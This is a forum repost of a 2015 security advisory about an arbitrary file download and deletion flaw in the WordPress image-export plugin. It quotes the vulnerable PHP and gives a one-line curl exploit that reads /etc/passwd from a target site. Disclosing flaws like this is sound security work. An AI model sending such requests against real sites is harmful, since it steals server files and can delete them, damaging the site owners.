KhiZaRix Posted July 15, 2015 Report Posted July 15, 2015 Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1Author: Larry W. Cashdollar, @_larry0Date: 2015-07-01Download Site: https://wordpress.org/plugins/image-exportVendor: www.1efthander.comVendor Notified: 2015-07-05Vendor Contact: https://twitter.com/1eftHanderDescription: Image Export plugin can help you selectively download images uploaded by an administrator .Vulnerability:The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only. And line 8 attempts tounlink the file after being downloaded. This script could be used to delete files out of the wordpress directory if file permissions allow. 1 <?php 2 if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) { 3 $file = $_GET['file']; 4 5 header( 'Content-Type: application/zip' ); 6 header( 'Content-Disposition: attachment; filename="' . $file . '"' ); 7 readfile( $file ); 8 unlink( $file ); 9 10 exit; 11 } 12 ?>CVEID: TBDExploit Code: • $ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwdScreen Shots:Advisory: http://www.vapid.dhs.org/advisory.php?v=135Source: https://dl.packetstormsecurity.net/1507-exploits/wpimageexport-download.txt Quote